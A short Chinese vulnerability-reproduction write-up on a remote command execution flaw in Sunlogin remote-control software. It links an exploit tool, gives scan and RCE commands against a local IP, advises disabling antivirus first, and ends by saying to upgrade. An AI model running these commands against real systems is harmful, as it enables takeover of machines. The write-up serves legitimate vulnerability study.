向日葵RCE复现
一、漏洞描述
向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。上海贝锐信息科技股份有限公司产品-向日葵-个人版 for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
二、环境搭建
https://github.com/Mr-xn/sunlogin_rce
三、POC测试
xrkRce.exe -h 192.168.0.196 -p 1-40000 -t scan
xrkRce.exe -h 192.168.0.196 -t rce -p 17869 -c "whoami"1. 扫描
2. 利用
有杀软的话还是会拦截,需要先关闭杀软。
四、漏洞修复
升级最新版本即可。
本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 (CC BY-NC-ND 4.0) 进行许可。